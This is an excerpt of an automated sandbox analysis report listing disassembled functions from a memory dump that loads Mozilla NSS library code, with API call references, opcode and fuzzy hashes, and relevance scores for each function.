Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 8842d2ea20e9f1d04b11962eb8139d8dfb4d37b87bf0d1ad20c2a3c370aed879
Instruction ID: 118c017168c4308d37627026f112ac647c0381b6d4d958a5bf5e9ee883ab70d4
Opcode Fuzzy Hash: 8842d2ea20e9f1d04b11962eb8139d8dfb4d37b87bf0d1ad20c2a3c370aed879
Instruction Fuzzy Hash: EB41BDB6B012069FDB209F19DA0876AB3B9AF5031CF244034EC29A7B10E335F914DBD2

Function 6C88AA70 Relevance: 7.6, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C88AA86

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Part of subcall function 6C88A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C88A662), ref: 6C88A69E
Part of subcall function 6C88A690: PR_NewCondVar.NSS3(?), ref: 6C88A6B4

PR_IntervalNow.NSS3 ref: 6C88AAEC
EnterCriticalSection.KERNEL32(?), ref: 6C88AB0A
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C88AB67
_PR_MD_UNLOCK.NSS3(?), ref: 6C88AB8B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CondCriticalEnterErrorIntervalSectionValuecalloc
String ID:
API String ID: 318662135-0
Opcode ID: c0bd56ca3f2a7ec781b27f5c5efeac2e10959de66fccceec71a5e2fc2cef6881
Instruction ID: 5dc0401763b07ce71d2673b1ef3e567dd952d98e6d1c6a5bf8fbbaf43723a6ac
Opcode Fuzzy Hash: c0bd56ca3f2a7ec781b27f5c5efeac2e10959de66fccceec71a5e2fc2cef6881
Instruction Fuzzy Hash: A1418FB4A013159FC760CF29CA8058AB7F6BF48718728497AD819DBF81E774EC44CB90

Function 6C76EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C76EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C76EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C76EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C76EEEB
free.MOZGLUE(?), ref: 6C76EEF6

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: e1d3a500d944eea0cbc5740427aaea387d59980630367e3f7d82b79b7f906c93
Instruction ID: 119bc0370f1be7aba77b4c4b7939fd09dfbc994d042f511e9bb8f30b8b63665e
Opcode Fuzzy Hash: e1d3a500d944eea0cbc5740427aaea387d59980630367e3f7d82b79b7f906c93
Instruction Fuzzy Hash: D531E4B1A006059BEB209F2ACD44B667BB8FB46318F140539EC5A87E51D731E914CBE1

Function 6C776AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(00000000,6C77B21D,00000000,00000000,6C77B219,?,6C776BFB,00000000,?,00000000,00000000,?,?,?,6C77B21D), ref: 6C776B01

Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7CFE08
Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7CFE1D
Part of subcall function 6C7CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7CFE62

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6C77B219,?,6C776BFB,00000000,?,00000000,00000000,?,?,?,6C77B21D), ref: 6C776B36
PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6C776B47
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C776B8A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6C776BB6

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
String ID:
API String ID: 1773792728-0
Opcode ID: 8f32537acaee0da48a5eb341e33896afbdffb707a7c69df077b725fae44966f4
Instruction ID: 5e5cf24aaebb4e82665a5dd69b611897f4d00ac0d8618f849a733ea9eb84d8ab
Opcode Fuzzy Hash: 8f32537acaee0da48a5eb341e33896afbdffb707a7c69df077b725fae44966f4
Instruction Fuzzy Hash: 4121F4719013189FEF208F65CE44B6A7BA8DB46358F254529EC08D7A25F731E654CBA0

Function 6C7E4BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6C7E4BDD

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6C7E4C03

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6C7E4C15
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6C7E4C3E

Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7CF0C8
Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7CF122

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6C7E4C85

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
String ID:
API String ID: 227267669-0
Opcode ID: 9dd0a32717f5a680efc16b7ac70d4fbe11af5e74807f444d85f000521e800905
Instruction ID: 326f36e8d7e35798049bc622374cd031fcfd11ae3020b070d69f04c104014960
Opcode Fuzzy Hash: 9dd0a32717f5a680efc16b7ac70d4fbe11af5e74807f444d85f000521e800905
Instruction Fuzzy Hash: 94210BB3A002016BEB100EE59E45BAB3698DB4936CF150134ED189B7A1F731E81496D1

Function 6C7E68A0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C7E68B4

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E68E6
PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6938
PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6986
PR_ExitMonitor.NSS3(?), ref: 6C7E69BA

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID:
API String ID: 1802314673-0
Opcode ID: adc0cee2a0c3cbb4bb496bea2841fe14b3b97ac9591b51de7f3c0a9a05a342e6
Instruction ID: dd4d2412713591d1e7be220652ee56f33ec03d82a9445e53e7235d437c070847
Opcode Fuzzy Hash: adc0cee2a0c3cbb4bb496bea2841fe14b3b97ac9591b51de7f3c0a9a05a342e6
Instruction Fuzzy Hash: 7331A432601915EBDB245B74DA087D6BA70BF4A30EF040239D91D91A51DB747968CFC3

Function 6C77AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000,00000000), ref: 6C77ADA7

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000,00000000), ref: 6C77ADB4

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C773FFF,?,?,?,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000), ref: 6C77ADD5

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8994B0,?,?,?,?,?,?,?,?,6C773FFF,00000000,?), ref: 6C77ADEC

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C773FFF), ref: 6C77AE3C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 47eccb3f2b567cbcd8721cd52df6bc351038d912c4a453418890b243cf9afe7e
Instruction ID: 08f92fd602adab4699a702c689c7bc82745d90bd8108ce6f4f550c5f9e486f45
Opcode Fuzzy Hash: 47eccb3f2b567cbcd8721cd52df6bc351038d912c4a453418890b243cf9afe7e
Instruction Fuzzy Hash: 45112961E002095BFB209B699E49BBF73BCDF9126DF044638EC1996741F760E55882F2

Function 6C7C8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8821
TlsGetValue.KERNEL32(?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C883D
EnterCriticalSection.KERNEL32(?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7C8887
PR_Unlock.NSS3(?,?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8899

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 04bd74edcf2aaa752561846071174adc700cab46c200a3cbe1ec1062d8c809d8
Instruction ID: 10c524dd9639db3fc0a16ee2c9b12b8b37e05ab93c1bfec17dd36191937c5451
Opcode Fuzzy Hash: 04bd74edcf2aaa752561846071174adc700cab46c200a3cbe1ec1062d8c809d8
Instruction Fuzzy Hash: C1217CB4A146068FDB10AF79C6881AABBF4FF05318F11467ADC9497B05E730E994CBD2

Function 6C7928A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C7880DD), ref: 6C7928BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C7880DD), ref: 6C7928D3
PR_Unlock.NSS3(?,?,?,?,?,6C7880DD), ref: 6C7928E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C7880DD), ref: 6C79290E
free.MOZGLUE(?,?,?,?,?,?,6C7880DD), ref: 6C79291A

Part of subcall function 6C789270: DeleteCriticalSection.KERNEL32(?,?,6C795089,?,6C793B70,?,?,?,?,?,6C795089,6C78F39B,00000000), ref: 6C78927F
Part of subcall function 6C789270: free.MOZGLUE(?,?,6C793B70,?,?,?,?,?,6C795089,6C78F39B,00000000), ref: 6C789286
Part of subcall function 6C789270: PL_HashTableDestroy.NSS3(?,6C793B70,?,?,?,?,?,6C795089,6C78F39B,00000000), ref: 6C789292

Part of subcall function 6C788B50: TlsGetValue.KERNEL32(00000000,?,6C790948,00000000), ref: 6C788B6B
Part of subcall function 6C788B50: EnterCriticalSection.KERNEL32(?,?,?,6C790948,00000000), ref: 6C788B80
Part of subcall function 6C788B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C790948,00000000), ref: 6C788B8F
Part of subcall function 6C788B50: PR_Unlock.NSS3(?,?,?,?,6C790948,00000000), ref: 6C788BA1
Part of subcall function 6C788B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C790948,00000000), ref: 6C788BAC
Part of subcall function 6C788B50: free.MOZGLUE(?,?,?,?,?,6C790948,00000000), ref: 6C788BB8

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: ccb5b8689d2b984bcb534627161e98634bc296efc82cd6672bf3c228a3bfeba4
Instruction ID: d46c17078793e958e4407880abdc6092848918f9f165099486cdb9e82dd8996b
Opcode Fuzzy Hash: ccb5b8689d2b984bcb534627161e98634bc296efc82cd6672bf3c228a3bfeba4
Instruction Fuzzy Hash: 062116B5A04A059BCB10BF78D18C469BBF0BF05368F014979DC9597B00E730E895CBD2

Function 6C7609E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6C7606A2,00000000,?), ref: 6C7609F8
malloc.MOZGLUE(0000001F), ref: 6C760A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C760A33

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

PR_Free.NSS3(?), ref: 6C760A6C
PR_Free.NSS3(?), ref: 6C760A87

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 45858f6182161d382b265ab04cd0605f024c0af669c7af6d91566b8054ed7dcc
Instruction ID: 0ebd373adf831cc69aea064320bcb482b944c456db9028a483e0df63a464f9c9
Opcode Fuzzy Hash: 45858f6182161d382b265ab04cd0605f024c0af669c7af6d91566b8054ed7dcc
Instruction Fuzzy Hash: 4B1106B5900B809BEB219F2ADB8975377A8BF0139CF40693ADC5682E00EB31F458C794

Function 6C788FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C790710), ref: 6C788FF1
PR_CallOnce.NSS3(6C8D2158,6C789150,00000000,?,?,?,6C789138,?,6C790710), ref: 6C789029
calloc.MOZGLUE(00000001,00000000,?,?,6C790710), ref: 6C78904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C790710), ref: 6C789066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C790710), ref: 6C789078

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: e69ea5feec6dbdce7786d1660c73eaf1a22a65413828616124cf503df5813993
Instruction ID: 606fe7c61a95441a5e77fe17d33b6a3955d830e054bedd5ca446358ae8328f41
Opcode Fuzzy Hash: e69ea5feec6dbdce7786d1660c73eaf1a22a65413828616124cf503df5813993
Instruction Fuzzy Hash: AF11442170221267EB201AADAE04A6A72ACEB927ADF400431FE48D2F40F753CD45C3E1

Function 6C804AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

PR_MemUnmap.NSS3(00015180,00000005,?,6C804AD1), ref: 6C804B62
free.MOZGLUE(?,00015180,00000005,?,6C804AD1), ref: 6C804B76

Part of subcall function 6C8003C0: CloseHandle.KERNEL32(?,?,?,?,6C804B27,?,?,00015180,00000005,?,6C804AD1), ref: 6C8003E0
Part of subcall function 6C8003C0: GetLastError.KERNEL32(?,6C804B27,?,?,00015180,00000005,?,6C804AD1), ref: 6C8003FD

Part of subcall function 6C8003C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6C804B27,?,?,00015180,00000005,?,6C804AD1), ref: 6C800419
Part of subcall function 6C8003C0: free.MOZGLUE(?,?,6C804B27,?,?,00015180,00000005,?,6C804AD1), ref: 6C800420

CloseHandle.KERNEL32(?,00015180,00000005,?,6C804AD1), ref: 6C804B96
free.MOZGLUE(?,?,6C804AD1), ref: 6C804B9D
memset.VCRUNTIME140(6C8D2F9C,00000000,00000090,00015180,00000005,?,6C804AD1), ref: 6C804BB2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
